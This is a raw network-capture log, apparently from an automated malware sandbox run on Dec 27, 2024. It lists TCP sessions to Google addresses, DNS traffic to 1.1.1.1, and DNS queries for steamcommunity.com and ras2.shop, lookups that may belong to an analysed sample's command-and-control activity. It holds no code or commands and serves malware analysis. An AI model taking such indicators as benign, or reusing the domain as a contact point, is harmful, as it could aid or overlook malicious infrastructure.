Dec 27, 2024 21:20:30.542273998 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.542360067 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.542376041 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.551388979 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.551444054 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.551471949 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.564376116 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.564583063 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.564610004 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.580837011 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.580904961 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.580934048 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.587043047 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.587105989 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.587129116 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.636878014 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.636908054 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.672555923 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.672626019 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.672657967 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.678416967 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.679019928 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.679053068 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.698422909 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.698539019 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.698570967 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.701173067 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.701308966 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.701319933 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.705492020 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.705538988 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.705552101 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.711752892 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.711796045 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.711798906 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.711812019 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.711847067 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.714931965 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.723933935 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.723984003 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.723998070 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.724030018 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.724071026 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.724080086 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.735430002 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.735481977 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.735511065 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.746742010 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.746795893 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.746825933 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.757683992 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.757782936 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.757795095 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.767894030 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.767978907 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.767991066 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.778136015 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.778187990 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.778197050 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.786716938 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.786839008 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.786848068 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.795924902 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.795970917 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.795979977 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.817936897 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.817996979 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.818023920 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.819574118 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.819626093 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.819647074 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.822786093 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.822859049 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.822874069 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.829941988 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.830002069 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.830032110 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.838644028 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.838746071 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.838789940 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.847034931 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.847104073 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.847138882 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.852372885 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.852437973 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.852468014 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.882173061 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.882220984 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.882306099 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.882333994 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.882891893 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.884350061 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.908571005 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.908678055 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.908711910 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.910351038 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.910429001 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.910450935 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.913019896 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.913105011 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.913129091 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.915561914 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.916132927 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.916145086 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.920814991 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.920846939 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.920869112 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.920880079 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.920927048 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.923444033 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.924309969 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.925513029 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.925582886 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.925837994 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.925858974 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:34.735426903 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:34.735450983 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:34.735539913 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:34.735743999 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:34.735754013 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:36.987086058 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:36.987422943 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:36.987449884 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:36.988456964 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:36.988537073 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:36.989820004 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:36.989882946 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:36.989975929 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:36.989983082 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.043699026 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.686958075 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.687010050 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.687072039 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.687088966 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.693284035 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.693353891 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.693358898 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.706242085 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.706304073 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.706307888 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.714680910 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.714746952 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.714751005 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.727202892 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.727288008 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.727292061 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.778177023 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.806515932 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.852715015 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.852730036 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.897684097 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.912092924 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.915688992 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.915767908 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.915780067 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.923137903 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.923207045 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.923213959 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.937747002 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.937777996 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.937800884 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.937808990 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.937864065 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.942358971 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.949347019 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.949418068 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.949424028 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.962670088 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.962738991 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.962744951 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.976064920 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.976140976 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.976145029 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.989355087 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.989438057 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.989484072 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:37.989495039 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:37.989536047 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.002594948 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.015722990 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.015820026 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.015822887 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.015834093 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.015877008 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.029195070 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.043090105 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.043225050 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.043237925 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.083020926 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.107614994 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.109308958 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.109412909 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.109426975 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.119152069 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.119210005 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.119215012 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.124489069 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.124555111 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.124562025 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.129853964 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.129956007 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.129993916 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.130000114 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.130059958 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.135343075 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.140516996 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.140568972 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.140575886 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.145751953 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.145800114 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.145804882 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.151882887 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.151954889 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.151977062 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.157744884 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.157813072 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.157835007 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.167386055 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.167457104 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.167479992 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.178325891 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.178389072 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.178411961 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.188745022 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.188855886 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.188878059 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.199022055 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.199094057 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.199115992 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.209213972 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.209295034 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.209316015 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.227272987 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.227370977 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.227395058 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.229051113 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.229120016 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.229130983 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.237694979 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.237761021 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.237770081 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.237787962 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.237834930 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.246567965 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.255465031 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.255520105 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.255531073 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.255553961 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.255604029 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.264045000 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.269227982 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.269284964 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.269311905 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.269335032 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.269382954 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.274730921 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.295953035 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.296037912 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.296060085 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.318859100 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.318909883 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.318921089 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.318928003 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.318974018 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.319217920 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:38.319251060 CET	443	49759	142.250.181.78	192.168.2.4
Dec 27, 2024 21:20:38.319319963 CET	49759	443	192.168.2.4	142.250.181.78
Dec 27, 2024 21:20:39.133452892 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:39.133559942 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:39.133651972 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:39.670846939 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:39.670896053 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:21:12.822321892 CET	49724	80	192.168.2.4	199.232.214.172
Dec 27, 2024 21:21:12.942502022 CET	80	49724	199.232.214.172	192.168.2.4
Dec 27, 2024 21:21:12.942576885 CET	49724	80	192.168.2.4	199.232.214.172
Dec 27, 2024 21:21:31.633435965 CET	49843	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:21:31.633546114 CET	443	49843	172.217.21.36	192.168.2.4
Dec 27, 2024 21:21:31.633661032 CET	49843	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:21:31.633887053 CET	49843	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:21:31.633919954 CET	443	49843	172.217.21.36	192.168.2.4
Dec 27, 2024 21:21:33.326447964 CET	443	49843	172.217.21.36	192.168.2.4
Dec 27, 2024 21:21:33.326812983 CET	49843	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:21:33.326869011 CET	443	49843	172.217.21.36	192.168.2.4
Dec 27, 2024 21:21:33.328031063 CET	443	49843	172.217.21.36	192.168.2.4
Dec 27, 2024 21:21:33.328330994 CET	49843	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:21:33.328466892 CET	443	49843	172.217.21.36	192.168.2.4
Dec 27, 2024 21:21:33.372823954 CET	49843	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:21:43.068128109 CET	443	49843	172.217.21.36	192.168.2.4
Dec 27, 2024 21:21:43.068315983 CET	443	49843	172.217.21.36	192.168.2.4
Dec 27, 2024 21:21:43.068504095 CET	49843	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:21:58.932980061 CET	49843	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:21:58.933029890 CET	443	49843	172.217.21.36	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 21:20:16.417402983 CET	60541	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:20:16.554373026 CET	53	60541	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:19.226968050 CET	60805	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:20:19.531995058 CET	53	60805	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:24.404293060 CET	138	138	192.168.2.4	192.168.2.255
Dec 27, 2024 21:20:27.255703926 CET	53	55916	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:27.256027937 CET	53	52799	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:27.322618961 CET	61772	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:20:27.322796106 CET	64004	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:20:27.459566116 CET	53	64004	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:27.459943056 CET	53	61772	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:30.121140003 CET	53	58669	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:31.274053097 CET	53	57963	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:34.588932037 CET	51256	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:20:34.589179993 CET	59356	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:20:34.725627899 CET	53	51095	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:34.726713896 CET	53	59356	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:34.729353905 CET	53	51256	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:35.583261013 CET	49382	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:20:35.583393097 CET	64735	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:20:35.720458984 CET	53	49382	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:35.720479012 CET	53	64735	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:39.808578014 CET	53	51625	1.1.1.1	192.168.2.4
Dec 27, 2024 21:20:47.210854053 CET	53	58319	1.1.1.1	192.168.2.4
Dec 27, 2024 21:21:05.795031071 CET	53	51129	1.1.1.1	192.168.2.4
Dec 27, 2024 21:21:27.050311089 CET	53	63227	1.1.1.1	192.168.2.4
Dec 27, 2024 21:21:28.117542028 CET	53	55240	1.1.1.1	192.168.2.4
Dec 27, 2024 21:21:59.165586948 CET	53	60102	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 27, 2024 21:21:56.890948057 CET	192.168.2.4	1.1.1.1	c233	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 21:20:16.417402983 CET	192.168.2.4	1.1.1.1	0xc276	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:19.226968050 CET	192.168.2.4	1.1.1.1	0x8c1d	Standard query (0)	ras2.shop	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:27.322618961 CET	192.168.2.4	1.1.1.1	0xce68	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:27.322796106 CET	192.168.2.4	1.1.1.1	0x45d	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 27, 2024 21:20:34.588932037 CET	192.168.2.4	1.1.1.1	0x742	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:34.589179993 CET	192.168.2.4	1.1.1.1	0x6ace	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 27, 2024 21:20:35.583261013 CET	192.168.2.4	1.1.1.1	0x36ec	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:20:35.583393097 CET	192.168.2.4	1.1.1.1	0x928	Standard query (0)	play.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
